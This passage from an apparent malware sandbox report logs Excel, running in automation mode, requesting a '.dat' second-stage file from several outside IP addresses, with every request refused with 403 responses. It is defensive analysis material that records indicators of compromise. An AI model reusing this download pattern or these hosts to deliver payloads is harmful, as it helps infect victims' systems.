    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 185.14.31.59
    Connection: Keep-Alive
    May 12, 2021 12:32:07.063368082 CEST1INHTTP/1.1 403 Forbidden
    Server: nginx
    Date: Wed, 12 May 2021 10:32:07 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


    Session IDSource IPSource PortDestination IPDestination PortProcess
    1192.168.2.224916845.138.157.6380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    TimestampkBytes transferredDirectionData
    May 12, 2021 12:32:07.181170940 CEST1OUTGET /44313,6048108796.dat HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 45.138.157.63
    Connection: Keep-Alive
    May 12, 2021 12:32:07.279536009 CEST2INHTTP/1.1 403 Forbidden
    Server: nginx
    Date: Wed, 12 May 2021 10:32:07 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


    Session IDSource IPSource PortDestination IPDestination PortProcess
    2192.168.2.2249169167.114.48.5980C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    TimestampkBytes transferredDirectionData
    May 12, 2021 12:32:07.424813986 CEST3OUTGET /44313,6048108796.dat HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 167.114.48.59
    Connection: Keep-Alive
    May 12, 2021 12:32:08.078650951 CEST4INHTTP/1.1 403 Forbidden
    Server: nginx
    Date: Wed, 12 May 2021 10:32:08 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


    Code Manipulations

    Statistics

    System Behavior

    General

    Start time:12:31:40
    Start date:12/05/2021
    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    Wow64 process (32bit):false
    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Imagebase:0x13f7c0000
    File size:27641504 bytes
    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Disassembly

    Reset < >